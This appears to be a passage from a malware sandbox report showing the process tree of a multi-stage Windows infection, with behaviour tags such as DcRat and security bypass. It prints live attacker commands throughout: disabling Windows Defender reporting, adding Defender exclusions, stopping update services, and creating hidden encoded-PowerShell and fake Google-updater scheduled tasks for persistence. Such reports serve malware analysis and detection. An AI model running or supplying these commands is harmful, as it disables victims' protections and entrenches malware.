C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:992
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe6⤵
- Executes dropped EXE
PID:1964 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn "csrss" /f7⤵PID:1564
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f7⤵PID:548
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\7zS9B65.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2508 -
C:\Users\Admin\AppData\Local\Temp\7zS9F99.tmp\Install.exe.\Install.exe /MKdidA "385119" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:456 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:2920
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:1624
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:2208
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2624
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:1648
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:2564
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:1788
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:592
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFzxpEGlo" /SC once /ST 03:41:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFzxpEGlo"6⤵PID:2060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFzxpEGlo"6⤵PID:2544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\XyJMdiY.exe\" 3Y /YUsite_iddOY 385119 /S" /V1 /F6⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:948
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"3⤵PID:2344
-
C:\Users\Admin\AppData\Local\Temp\set16.exe"C:\Users\Admin\AppData\Local\Temp\set16.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2908 -
C:\Users\Admin\AppData\Local\Temp\is-GMGKF.tmp\is-RV8TA.tmp"C:\Users\Admin\AppData\Local\Temp\is-GMGKF.tmp\is-RV8TA.tmp" /SL4 $30274 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 522245⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:292 -
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2192
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵PID:2784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵PID:1136
-
-
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2412
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵PID:2300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\K.exe"C:\Users\Admin\AppData\Local\Temp\K.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\8398.exeC:\Users\Admin\AppData\Local\Temp\8398.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3068
-
-
C:\Users\Admin\AppData\Local\Temp\85FA.exeC:\Users\Admin\AppData\Local\Temp\85FA.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 108 -s 5243⤵
- Loads dropped DLL
- Program crash
PID:2580
-
-
-
C:\Users\Admin\AppData\Local\Temp\E653.exeC:\Users\Admin\AppData\Local\Temp\E653.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:840 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\EF49.exeC:\Users\Admin\AppData\Local\Temp\EF49.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 2564⤵
- Program crash
PID:2356
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2716
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1356
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2932
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2868
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:912
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2936 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- DcRat
- Creates scheduled task(s)
PID:2848
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3044
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2572
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2632
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3024
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1716
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- DcRat
- Creates scheduled task(s)
PID:112
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2100
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1392
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8EC17B98-6D02-4BFD-8455-2D60468E4C71} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]1⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2544 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe2⤵
- Executes dropped EXE
PID:936
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2344 -
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231025045611.log C:\Windows\Logs\CBS\CbsPersist_20231025045611.cab2⤵
- Drops file in Windows directory
PID:1884
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1237547837-19769103081368229090457214978-82246931-1361302412-471496338994689841"1⤵PID:2060
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1368
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1252975627705939282173712206114515182731731425446-1767571115-676940181-984786126"1⤵
- Modifies data under HKEY_USERS
PID:568
-
C:\Windows\system32\taskeng.exetaskeng.exe {869B2C5B-4766-4616-8BC8-6C3CC86EFDB2} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2360
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\XyJMdiY.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\XyJMdiY.exe 3Y /YUsite_iddOY 385119 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2896 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbjSqMrIH" /SC once /ST 01:37:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- DcRat
- Creates scheduled task(s)
PID:2952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbjSqMrIH"3⤵PID:2144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbjSqMrIH"3⤵PID:2688
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:323⤵PID:2448
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:643⤵PID:936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:323⤵PID:2624
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:324⤵PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:643⤵PID:1876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:644⤵PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\wUBDPVxDQVpvNZiy\yADjUkDH\IlAdNqjeeEUnIEyj.wsf"3⤵PID:1880
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\wUBDPVxDQVpvNZiy\yADjUkDH\IlAdNqjeeEUnIEyj.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2616 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵PID:2872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:324⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:644⤵PID:2532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:324⤵PID:2968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:644⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:324⤵PID:3012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:324⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:644⤵PID:3060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:324⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:324⤵PID:2544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:324⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:644⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:324⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:644⤵PID:2004
-
-
